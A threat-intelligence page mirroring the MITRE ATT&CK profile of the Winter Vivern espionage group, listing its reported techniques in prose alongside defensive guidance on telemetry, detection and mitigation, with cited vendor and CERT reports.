G1035: Winter Vivern
Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.[1][2][3][4][5]
Analyst context for executives and security teams
Winter Vivern matters because ATT&CK describes it as targeting government and NGO entities with document-based phishing and server-side exploitation, followed by adversary-controlled infrastructure for command and control. For leaders, the decision value is not the name of the group; it is whether email, webmail, public-facing applications, endpoint scripting, and outbound web traffic are covered well enough to detect and respond to this style of intrusion before collection and exfiltration occur.
Executive priority
Prioritize this as an exposure and readiness question for organizations with government, NGO, policy, diplomatic, or similarly targeted operations. Ask whether public-facing web applications and webmail are inventoried, patched, logged, and monitored; whether phishing defenses produce usable evidence; and whether SOC and IR teams can trace activity from initial access through discovery, collection, command and control, and exfiltration. The object supports budget focus on email security, vulnerability management for Internet-facing services, endpoint logging, network egress visibility, and incident response playbooks for compromised accounts or web portals.
Technical view
ATT&CK does not provide group-level platforms or detection text for this object, so validation should be built from the described behaviors and relationships. The relationship set includes initial access via Spearphishing Attachment, Malicious Link, Drive-by Compromise, and Exploit Public-Facing Application; execution through command and scripting interpreters including PowerShell, Windows Command Shell, and JavaScript; persistence/execution via Scheduled Task; discovery of users, systems, files, and directories; collection including local email, screen capture, automated collection, and web portal credential capture; C2 over web protocols; ingress tool transfer; and automated or C2-channel exfiltration. SOC teams should test whether they can correlate email/web events, endpoint process and scheduled task activity, public-facing application logs, outbound HTTP/S-like C2 patterns, and data movement indicators into one investigation timeline.
Likely telemetry
- Email security gateway and mailbox telemetry for attachments, links, sender infrastructure, and user interaction
- Public-facing web application and webmail logs, especially authentication, request anomalies, exploitation indicators, file changes, and administrative activity
- Endpoint process creation and command-line telemetry for PowerShell, cmd, JavaScript/script execution, decoding activity, and discovery commands
- Windows Task Scheduler and service/task creation or modification events
- File system telemetry for local email stores, sensitive directory enumeration, staging, and automated collection patterns
Detection direction
- Do not treat this as a single signature problem; validate coverage across the chain from phishing or public-facing exploitation to discovery, collection, C2, and exfiltration.
- Tune phishing detections for targeted attachments and links, but account for false positives from normal government/NGO document exchange and legitimate bulk email workflows.
- For Internet-facing applications and webmail, confirm that logs are centralized and retained long enough to support exploitation investigation, credential-theft triage, and timeline reconstruction.
- Monitor scripting and shell activity in context: unusual PowerShell, cmd, or JavaScript execution is more meaningful when paired with suspicious parent processes, downloaded content, discovery commands, scheduled tasks, or outbound web traffic.
- Review scheduled tasks and masqueraded service/task names against known-good baselines rather than relying only on obviously malicious names.
Mitigation priorities
- Start with exposure management for public-facing applications and webmail: maintain an accurate Internet-facing asset inventory, prioritize patching and configuration review, and verify logging is enabled before incidents occur.
- Strengthen phishing resilience with attachment/link controls, user reporting workflows, and investigation processes that preserve email artifacts and user-click evidence.
- Reduce credential risk around externally exposed portals by enforcing strong authentication, monitoring anomalous logins, and reviewing portal integrity where credential capture is a concern.
- Harden endpoint execution paths by governing script interpreters, PowerShell usage, scheduled tasks, and service creation according to business need.
- Improve egress control and monitoring so command and control, tool transfer, and exfiltration over web protocols are visible and can be contained.
Analyst notes and limits
This take is based on the supplied ATT&CK group description, aliases, external reference metadata, and listed technique relationships. The relationship context suggests a broad operational pattern involving phishing, exploitation of public-facing services, scripting, discovery, collection, C2, and exfiltration, but local prioritization should be driven by the organization’s actual exposure, sector, public-facing applications, identity architecture, and available telemetry.
ATT&CK provides no official detection text, no group-level platforms, and no group-level tactics in the supplied fields. Technique platform lists describe the related ATT&CK techniques, not guaranteed Winter Vivern platform scope in any specific environment. External reference titles mention specific webmail technologies, but this response does not infer current exploitation or customer exposure from those references.
Winter Vivern
Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.[1][2][3][4][5]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059 | Command and Scripting Interpreter | Winter Vivern used XLM 4.0 macros for initial code execution for malicious document files.CitationDomainTools WinterVivern 2021 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.CitationSentinelOne WinterVivern 2023CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1056.003 | Web Portal Capture Sub-technique | Winter Vivern registered and hosted domains to allow for creation of web pages mimicking legitimate government email logon sites to collect logon information.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1033 | System Owner/User Discovery | Winter Vivern PowerShell scripts execute `whoami` to identify the executing user.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | Winter Vivern used adversary-owned and -controlled servers to host web vulnerability scanning applications.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Winter Vivern delivered malicious JavaScript to exploit targets when exploiting Roundcube Webmail servers.CitationESET WinterVivern 2023 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Winter Vivern leverages malicious attachments delivered via email for initial access activity.CitationDomainTools WinterVivern 2021CitationSentinelOne WinterVivern 2023CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Winter Vivern has distributed malicious scripts and executables mimicking virus scanners.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1113 | Screen Capture | Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines.CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1189 | Drive-by Compromise | Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious fake anti-virus software.CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1119 | Automated Collection | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Winter Vivern delivered exploit payloads via base64-encoded payloads in malicious email messages.CitationESET WinterVivern 2023 |
| Enterprise | T1020 | Automated Exfiltration | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1105 | Ingress Tool Transfer | Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads.CitationDomainTools WinterVivern 2021 |
| Enterprise | T1190 | Exploit Public-Facing Application | Winter Vivern has exploited known and zero-day vulnerabilities in software usch as Roundcube Webmail servers and the "Follina" vulnerability.CitationESET WinterVivern 2023CitationProofpoint WinterVivern 2023 |
| Enterprise | T1595.002 | Vulnerability Scanning Sub-technique | Winter Vivern has used remotely-hosted instances of the Acunetix vulnerability scanner.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Winter Vivern executed PowerShell scripts that would subsequently attempt to establish persistence by creating scheduled tasks objects to periodically retrieve and execute remotely-hosted payloads.CitationDomainTools WinterVivern 2021 |
| Enterprise | T1584.006 | Web Services Sub-technique | Winter Vivern has used compromised WordPress sites to host malicious payloads for download.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1036 | Masquerading | Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns.CitationSentinelOne WinterVivern 2023 |
| Enterprise | T1583.001 | Domains Sub-technique | Winter Vivern registered domains mimicking other entities throughout various campaigns.CitationDomainTools WinterVivern 2021 |
| Enterprise | T1082 | System Information Discovery | Winter Vivern script execution includes basic victim information gathering steps which are then transmitted to command and control servers.CitationDomainTools WinterVivern 2021 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Winter Vivern distributed Windows batch scripts disguised as virus scanners to prompt download of malicious payloads using built-in system tools.CitationSentinelOne WinterVivern 2023CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Winter Vivern has mimicked legitimate government-related domains to deliver malicious webpages containing links to documents or other content for user execution.CitationSentinelOne WinterVivern 2023CitationCERT-UA WinterVivern 2023 |
| Enterprise | T1083 | File and Directory Discovery | Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails in exploited email servers.CitationESET WinterVivern 2023 |
| Enterprise | T1114.001 | Local Email Collection Sub-technique | Winter Vivern delivered malicious JavaScript payloads capable of exfiltrating email messages from exploited email servers.CitationESET WinterVivern 2023 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Winter Vivern passed execution from document macros to PowerShell scripts during initial access operations.CitationDomainTools WinterVivern 2021 Winter Vivern used batch scripts that called PowerShell commands as part of initial access and installation operations.CitationCERT-UA WinterVivern 2023 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 8a04cd4c4751… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
DomainTools WinterVivern 2021
Chad Anderson. (2021, April 27). Winter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple Languages. Retrieved July 29, 2024.
Open source URL -
[2]
SentinelOne WinterVivern 2023
Tom Hegel. (2023, March 16). Winter Vivern | Uncovering a Wave of Global Espionage. Retrieved July 29, 2024.
Open source URL -
[3]
CERT-UA WinterVivern 2023
CERT-UA. (2023, February 1). UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities (CERT-UA#5909). Retrieved July 29, 2024.
Open source URL -
[4]
ESET WinterVivern 2023
Matthieu Faou. (2023, October 25). Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers. Retrieved July 29, 2024.
Open source URL -
[5]
Proofpoint WinterVivern 2023
Michael Raggi & The Proofpoint Threat Research Team. (2023, March 30). Exploitation is a Dish Best Served Cold: Winter Vivern Uses Known Zimbra Vulnerability to Target Webmail Portals of NATO-Aligned Governments in Europe. Retrieved July 29, 2024.
Open source URL -
[6]
TA473
(Citation: Proofpoint WinterVivern 2023)
-
[7]
UAC-0114
(Citation: CERT-UA WinterVivern 2023)
-
[8]
mitre-attack G1035Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.